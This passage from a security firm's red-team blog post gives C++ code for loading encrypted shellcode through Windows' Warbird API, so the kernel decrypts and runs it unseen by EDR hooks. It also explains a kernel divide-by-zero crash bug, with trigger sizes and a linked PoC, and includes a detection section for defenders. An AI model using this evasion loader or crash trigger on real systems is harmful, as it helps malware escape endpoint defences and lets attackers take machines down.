Up to the end of the struct<br \/> \u00a0\u00a0\u00a0\u00a0\u00a0 reinterpret_cast&lt;uint8_t*&gt;(&amp;params.ucHash), \/\/ Store the hash here<br \/> \u00a0\u00a0\u00a0\u00a0\u00a0 reinterpret_cast&lt;uint8_t*&gt;(&amp;params.ulStructSize) \/\/ End of the hash field<br \/>);<\/pre><p>The picosha2 namespace is a simple SHA-256 implementation that can be found <span style=\"text-decoration: underline;\"><a href=\"https:\/\/github.com\/okdshin\/PicoSHA2\">here<\/a><\/span>.<\/p><h3>Execution<\/h3><p>After the data has been prepared, we can now load the Microsoft-signed DLL into our process, change the contents of the .text section to contain the HEAP_EXECUTE_CALL_ARGUMENT struct and encrypted shellcode, mark the section as executable and finally call the Warbird API:<\/p><pre>HMODULE clipc = LoadLibraryA(\"clipc.dll\"); \/\/ Microsoft-signed DLL<br \/>if (clipc == NULL) return 1;<br \/>DWORD old;<br \/>VirtualProtect(clipc, sizeof(params) + sizeof(encrypted), PAGE_READWRITE, &amp;old);<br \/>memcpy(clipc, &amp;params, sizeof(params));<br \/>memcpy((uint8_t*)clipc + sizeof(params), &amp;encrypted, sizeof(encrypted));<br \/>VirtualProtect(clipc, sizeof(params) + sizeof(encrypted), PAGE_EXECUTE_READ, &amp;old);<br \/>NTSTATUS result = 0;<br \/>WB_OPERATION request{<br \/> \u00a0\u00a0\u00a0\u00a0\u00a0 .OperationType = WarbirdRuntime::WbOperationHeapExecuteCall,<br \/> \u00a0\u00a0\u00a0\u00a0\u00a0 .pHeapExecuteCallArgument = (PHEAP_EXECUTE_CALL_ARGUMENT)clipc,<br \/> \u00a0\u00a0\u00a0\u00a0\u00a0 .Result = &amp;result<br \/>};<br \/>NTSTATUS status = NtQuerySystemInformation(SystemCodeFlowTransition, &amp;request, sizeof(request), nullptr);<\/pre><p>And that&#8217;s it! The kernel will now decrypt the shellcode, place it in the process&#8217;s memory and redirect execution to the beginning of the decrypted shellcode. Notice how we didn\u2019t ever have to invoke any syscall with the decrypted shellcode as an argument? This is usually the case when loading shellcode, for example when calling VirtualProtect on a memory region to set it executable, the region usually already contains the decrypted shellcode and is used by EDR products as a point of detection by scanning the memory regions passed to the kernel for known signatures. This isn\u2019t possible in our case: An EDR spying on syscalls and scanning associated memory regions will only \u201csee\u201d encrypted shellcode, and thus come up empty handed. The full code for the above example can found in our <span style=\"text-decoration: underline;\"><a href=\"https:\/\/github.com\/cirosec\/warbird-demos\/\">GitHub repository<\/a><\/span>.<\/p><h3>Limitations<\/h3><p>We&#8217;ve now seen how we can load encrypted shellcode using the Warbird API, but there are some limitations to keep in mind:<\/p><ol><li>We still need to call VirtualProtect(RX) to change the permissions of the .text This could be detected as suspicious behaviour by some EDR products, but we haven&#8217;t seen any detections solely based on this pattern because the contents that are placed in the .text section are fully encrypted and thus not detectable as malicious shellcode.<\/li><li>The functionality we&#8217;re abusing here was never intended to be used for entire shellcode payloads but rather for small, sensitive code blocks. The Warbird API limits the size of the encrypted code to 0x10000 bytes, so we cannot load any shellcode larger than 64 KiB. There might be ways to work around this limitation by dynamically loading and re-linking the shellcode, but this is left as an exercise for the reader \ud83d\ude09<\/li><\/ol><p>We&#8217;ve not put much research effort into the other available operations, especially those not previously documented by <span style=\"text-decoration: underline;\"><a href=\"https:\/\/downwithup.github.io\/blog\/post\/2023\/04\/23\/post9.html\">DownWithUp<\/a><\/span>, so these are probably a good starting point for further research.<\/p><h2>Blue Team Perspective<\/h2><p>This technique is very effective at bypassing existing shellcode loading detections. Typically, to simplify a bit, an anti-malware product might scan all memory addresses referenced by an application when calling a Windows API that could cause execution to start at that address, such as NtCreateThreadEx, or operations that cause memory to become executable, such as NtProtectVirtualMemory. The anti-malware product may then use a signature database or use pattern-based detection to determine whether the memory that is about to be executed is malicious or not. In some cases, an anti-malware product might simply block all operations that that allocate memory, mark the allocated memory as being executable and pass executed to the newly allocated memory, regardless of the actual memory content, especially if the executable performing these operations is not trustworthy by some metric. The technique presented here bypasses this scanning because the memory that we\u2019re \u201csupplying\u201d as pointer arguments to the Windows API only contains encrypted shellcode. The address of the decrypted shellcode, which is allocated by the kernel itself, is not even passed back to userspace. Because the shellcode is decrypted and executed \u201cin one go\u201d by the kernel itself, any hooks on Windows API calls placed by an anti-malware product are bypassed.<\/p><p>To nonetheless detect this behaviour, an anti-malware product may opt to decrypt any shellcode passed to NtQuerySystemInformation itself and check the decrypted shellcode for known signatures, block any use of Warbird APIs in non-Microsoft processes, or may rely on behaviour detection and periodic memory scanning to detect the known malicious shellcode, once it has been decrypted by the kernel.<\/p><h2>Conclusion<\/h2><p>This is a very powerful technique, as it allows us to bypass most AV and EDR scrutiny. If an EDR product intercepts the syscall, it will only see the encrypted shellcode, and not the decrypted shellcode that is executed, so any signatures or heuristics that the EDR product uses to detect malicious shellcode will not trigger. We&#8217;ve successfully used this technique in practice to bypass multiple leading EDR solutions.<\/p><h2>Bonus: BSOD<\/h2><p>While researching and experimenting with Warbird, we encountered a bug in the Warbird API that can be used to trigger a blue screen of death. When allocating memory in the process&#8217;s heap, the kernel adds some randomness to the base address of the allocated memory, presumably as a kind of &#8220;Pseudo Adress Space Layout Randomization (ASLR)\u201d. An implementation error in this allocation function causes a divide by zero in the kernel when the required size is between 0xffc1 and 0xffff:<\/p><pre>uint32_t slot_count = (required_size + 63) \/ 64;<br \/>uint32_t rand_offset = ExGenRandom(1) % (1024 - slot_count);<\/pre><p>Working backwards, when slot_count == 1024, the kernel will attempt a modulo operation with a divisor of zero, which will cause a division by zero in the kernel. Because slot_count is simply required_size divided by 64 (rounded up), the required size for this bug to trigger is 0xffc1 &lt;= required_size &lt;= 0xffff.<\/p><p>The value of required_size here is simply ulSize + 16, so any values for ulSize in the range from 0xffb1 to 0xfff0 will cause the division by zero. We have included a PoC for this bug in our <span style=\"text-decoration: underline;\"><a href=\"https:\/\/github.com\/cirosec\/warbird-demos\/\">GitHub repository<\/a>.<\/span><\/p><h2>Further Reading<\/h2><ul><li><a href=\"https:\/\/www.youtube.com\/watch?v=gu_i6LYuePg\"><span style=\"text-decoration: underline;\">Alex Ionescu \u2013 The \u201cBird\u201d That Killed Arbitrary Code Guard<\/span><\/a><\/li><li><span style=\"text-decoration: underline;\"><a href=\"https:\/\/downwithup.github.io\/blog\/post\/2023\/04\/23\/post9.html\">DownWithUp \u2013 Example of Windows Warbird Encryption\/Decryption<\/a><\/span><\/li><li><a href=\"https:\/\/github.com\/br4ndn\/warbird-example\"><span style=\"text-decoration: underline;\">https:\/\/github.com\/br4ndn\/warbird-example<\/span><\/a><\/li><li><a href=\"https:\/\/github.com\/airbus-seclab\/warbirdvm\"><span style=\"text-decoration: underline;\">https:\/\/github.com\/airbus-seclab\/warbirdvm<\/span><\/a><\/li><li><span style=\"text-decoration: underline;\"><a href=\"https:\/\/github.com\/KiFilterFiberContext\/warbird-obfuscator\">https:\/\/github.com\/KiFilterFiberContext\/warbird-obfuscator<\/a><\/span><\/li><li><span style=\"text-decoration: underline;\"><a href=\"https:\/\/github.com\/KiFilterFiberContext\/Microsoft-warbird\">https:\/\/github.com\/KiFilterFiberContext\/Microsoft-warbird<\/a><\/span><\/li><\/ul><p><a href=\"#_ftnref1\" name=\"_ftn1\">[1]<\/a> This is actually a bit more involved, as it is relative to the start of the current Warbird block. If we set ulParametersRva to zero though, the offset will be relative to the start of the struct. Refer to the talk by Alex Ionescu for more information.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-4a67e23d elementor-widget elementor-widget-menu-anchor\" data-id=\"4a67e23d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"menu-anchor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-menu-anchor\" id=\"section3\"><\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-175098f4\" data-id=\"175098f4\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-363cdc1e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"363cdc1e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-3b9ccde2\" data-id=\"3b9ccde2\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-29aacccb elementor-widget__width-initial elementor-widget elementor-widget-heading\" data-id=\"29aacccb\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Further blog articles<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-2a1bbefb\" data-id=\"2a1bbefb\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-44f1f66c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"44f1f66c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3b0766ab\" data-id=\"3b0766ab\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6f1b191 elementor-grid-3 elementor-grid-tablet-2 elementor-grid-mobile-1 elementor-posts--thumbnail-top elementor-card-shadow-yes elementor-posts__hover-gradient load-more-align-center elementor-widget elementor-widget-posts\" data-id=\"6f1b191\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;pagination_type&quot;:&quot;load_more_on_click&quot;,&quot;cards_columns&quot;:&quot;3&quot;,&quot;cards_columns_tablet&quot;:&quot;2&quot;,&quot;cards_columns_mobile&quot;:&quot;1&quot;,&quot;cards_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:35,&quot;sizes&quot;:[]},&quot;cards_row_gap_tablet_extra&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;cards_row_gap_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;cards_row_gap_mobile_extra&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;cards_row_gap_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;load_more_spinner&quot;:{&quot;value&quot;:&quot;fas fa-spinner&quot;,&quot;library&quot;:&quot;fa-solid&quot;}}\" data-widget_type=\"posts.cards\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-posts-container elementor-posts elementor-posts--skin-cards elementor-grid\" role=\"list\">\n\t\t\t\t<article class=\"elementor-post elementor-grid-item post-9031 post type-post status-publish format-standard has-post-thumbnail hentry category-blog category-red-teaming category-red-teaming-en tag-loader-dev\" role=\"listitem\">\n\t\t\t<div class=\"elementor-post__card\">\n\t\t\t\t<a class=\"elementor-post__thumbnail__link\" href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-4-amsi-and-etw\/\" tabindex=\"-1\" ><div class=\"elementor-post__thumbnail\"><img decoding=\"async\" width=\"300\" height=\"203\" src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/web-applikationen-portale-services-300x203.jpg\" class=\"attachment-medium size-medium wp-image-12061\" alt=\"\" srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/web-applikationen-portale-services-300x203.jpg 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/web-applikationen-portale-services-1024x692.jpg 1024w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/web-applikationen-portale-services-768x519.jpg 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/web-applikationen-portale-services.jpg 1500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/div><\/a>\n\t\t\t\t<div class=\"elementor-post__badge\">Blog<\/div>\n\t\t\t\t<div class=\"elementor-post__text\">\n\t\t\t\t<h3 class=\"elementor-post__title\">\n\t\t\t<a href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-4-amsi-and-etw\/\" >\n\t\t\t\tLoader Dev. 4 &#8211; AMSI and ETW\t\t\t<\/a>\n\t\t<\/h3>\n\t\t\t\t<div class=\"elementor-post__excerpt\">\n\t\t\t<p>April 30, 2024 &#8211; In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.<br \/>\n<br \/>\nAuthor: Kolja Grassmann<\/p>\n\t\t<\/div>\n\t\t\n\t\t<a class=\"elementor-post__read-more\" href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-4-amsi-and-etw\/\" aria-label=\"Read more about Loader Dev. 4 &#8211; AMSI and ETW\" tabindex=\"-1\" >\n\t\t\tMehr Infos \u00bb\t\t<\/a>\n\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/article>\n\t\t\t\t<article class=\"elementor-post elementor-grid-item post-9032 post type-post status-publish format-standard has-post-thumbnail hentry category-blog-en category-blog category-red-teaming-en category-red-teaming tag-loader-dev\" role=\"listitem\">\n\t\t\t<div class=\"elementor-post__card\">\n\t\t\t\t<a class=\"elementor-post__thumbnail__link\" href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-3-evading-userspace-hooks\/\" tabindex=\"-1\" ><div class=\"elementor-post__thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/beratung-konzepte-reviews-und-analysen-300x200.jpg\" class=\"attachment-medium size-medium wp-image-12075\" alt=\"\" srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/beratung-konzepte-reviews-und-analysen-300x200.jpg 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/beratung-konzepte-reviews-und-analysen-1024x683.jpg 1024w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/beratung-konzepte-reviews-und-analysen-768x512.jpg 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/beratung-konzepte-reviews-und-analysen.jpg 1500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/div><\/a>\n\t\t\t\t<div class=\"elementor-post__badge\">Blog<\/div>\n\t\t\t\t<div class=\"elementor-post__text\">\n\t\t\t\t<h3 class=\"elementor-post__title\">\n\t\t\t<a href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-3-evading-userspace-hooks\/\" >\n\t\t\t\tLoader Dev. 3 &#8211; Evading userspace hooks\t\t\t<\/a>\n\t\t<\/h3>\n\t\t\t\t<div class=\"elementor-post__excerpt\">\n\t\t\t<p>April 10, 2024 &#8211; In this post, we will go over techniques to avoid hooks placed into memory by an EDR.<br \/>\n<br \/>\nAuthor: Kolja Grassmann<\/p>\n\t\t<\/div>\n\t\t\n\t\t<a class=\"elementor-post__read-more\" href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-3-evading-userspace-hooks\/\" aria-label=\"Read more about Loader Dev. 3 &#8211; Evading userspace hooks\" tabindex=\"-1\" >\n\t\t\tMehr Infos \u00bb\t\t<\/a>\n\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/article>\n\t\t\t\t<article class=\"elementor-post elementor-grid-item post-9035 post type-post status-publish format-standard has-post-thumbnail hentry category-blog category-red-teaming category-red-teaming-en tag-loader-dev\" role=\"listitem\">\n\t\t\t<div class=\"elementor-post__card\">\n\t\t\t\t<a class=\"elementor-post__thumbnail__link\" href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-2-dynamically-resolving-functions\/\" tabindex=\"-1\" ><div class=\"elementor-post__thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/aktive-directory-sicherheit-300x200.jpg\" class=\"attachment-medium size-medium wp-image-12083\" alt=\"\" srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/aktive-directory-sicherheit-300x200.jpg 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/aktive-directory-sicherheit-1024x683.jpg 1024w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/aktive-directory-sicherheit-768x512.jpg 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/02\/aktive-directory-sicherheit.jpg 1500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/div><\/a>\n\t\t\t\t<div class=\"elementor-post__badge\">Blog<\/div>\n\t\t\t\t<div class=\"elementor-post__text\">\n\t\t\t\t<h3 class=\"elementor-post__title\">\n\t\t\t<a href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-2-dynamically-resolving-functions\/\" >\n\t\t\t\tLoader Dev. 2 &#8211; Dynamically resolving functions\t\t\t<\/a>\n\t\t<\/h3>\n\t\t\t\t<div class=\"elementor-post__excerpt\">\n\t\t\t<p>March 10, 2024 &#8211; In this post, we discuss dynamically resolving functions, which help to avoid static detections based on the functions imported by our executable.<br \/>\n<br \/>\nAuthor: Kolja Grassmann<\/p>\n\t\t<\/div>\n\t\t\n\t\t<a class=\"elementor-post__read-more\" href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-2-dynamically-resolving-functions\/\" aria-label=\"Read more about Loader Dev. 2 &#8211; Dynamically resolving functions\" tabindex=\"-1\" >\n\t\t\tMehr Infos \u00bb\t\t<\/a>\n\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/article>\n\t\t\t\t<article class=\"elementor-post elementor-grid-item post-9036 post type-post status-publish format-standard has-post-thumbnail hentry category-blog category-red-teaming category-red-teaming-en tag-loader-dev\" role=\"listitem\">\n\t\t\t<div class=\"elementor-post__card\">\n\t\t\t\t<a class=\"elementor-post__thumbnail__link\" href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-1-basics\/\" tabindex=\"-1\" ><div class=\"elementor-post__thumbnail\"><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-300x200.jpg\" class=\"attachment-medium size-medium wp-image-18516\" alt=\"\" srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-300x200.jpg 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-1024x683.jpg 1024w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-768x513.jpg 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-1536x1025.jpg 1536w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/07\/adi-goldstein-EUsVwEOsblE-unsplash-2048x1367.jpg 2048w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/div><\/a>\n\t\t\t\t<div class=\"elementor-post__badge\">Blog<\/div>\n\t\t\t\t<div class=\"elementor-post__text\">\n\t\t\t\t<h3 class=\"elementor-post__title\">\n\t\t\t<a href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-1-basics\/\" >\n\t\t\t\tLoader Dev. 1 &#8211; Basics\t\t\t<\/a>\n\t\t<\/h3>\n\t\t\t\t<div class=\"elementor-post__excerpt\">\n\t\t\t<p>February 10, 2024 &#8211; This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.<br \/>\n<br \/>\nAuthor: Kolja Grassmann<\/p>\n\t\t<\/div>\n\t\t\n\t\t<a class=\"elementor-post__read-more\" href=\"https:\/\/cirosec.de\/en\/news\/loader-dev-1-basics\/\" aria-label=\"Read more about Loader Dev. 1 &#8211; Basics\" tabindex=\"-1\" >\n\t\t\tMehr Infos \u00bb\t\t<\/a>\n\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/article>\n\t\t\t\t<\/div>\n\t\t\t\t\t<span class=\"e-load-more-spinner\">\n\t\t\t\t<i aria-hidden=\"true\" class=\"fas fa-spinner\"><\/i>\t\t\t<\/span>\n\t\t\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t<div class=\"elementor-element elementor-element-7dcc662a e-con-full e-flex e-con e-parent\" data-id=\"7dcc662a\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-15ed2ab0 elementor-widget elementor-widget-template\" data-id=\"15ed2ab0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"template.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-template\">\n\t\t\t\t\t<div data-elementor-type=\"section\" data-elementor-id=\"6023\" class=\"elementor elementor-6023 elementor-2968 elementor-2968\" data-elementor-post-type=\"elementor_library\">\n\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3920b242 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3920b242\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-61cde52c\" data-id=\"61cde52c\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7eba007 elementor-widget elementor-widget-spacer\" data-id=\"7eba007\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7346d88 elementor-widget elementor-widget-heading\" data-id=\"7346d88\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-heading-title elementor-size-default\">Do you want to protect your systems? Feel free to get in touch with us.<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-1b0432b elementor-widget elementor-widget-spacer\" data-id=\"1b0432b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-5cdf3c58 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"5cdf3c58\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-40c99187\" data-id=\"40c99187\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a1d7b6a elementor-align-right elementor-widget elementor-widget-button\" data-id=\"4a1d7b6a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/cirosec.de\/en\/inquiry\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Send Enquiry<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-3b9d9ea6\" data-id=\"3b9d9ea6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7e7c4d9b elementor-widget elementor-widget-button\" data-id=\"7e7c4d9b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/cirosec.de\/en\/contact-us\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Contact Details<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-38fcd8fa elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"38fcd8fa\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3039b5a2\" data-id=\"3039b5a2\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-649a7df5 elementor-widget elementor-widget-template\" data-id=\"649a7df5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"template.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-template\">\n\t\t\t\t\t<footer data-elementor-type=\"footer\" data-elementor-id=\"6025\" class=\"elementor elementor-6025 elementor-945 elementor-945\" data-elementor-post-type=\"elementor_library\">\n\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1e44cc2 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"1e44cc2\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e9b41ce\" data-id=\"e9b41ce\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-51c0c74 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"51c0c74\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-8ac5cc6\" data-id=\"8ac5cc6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-af371ae elementor-widget elementor-widget-theme-site-logo elementor-widget-image\" data-id=\"af371ae\" data-element_type=\"widget\" 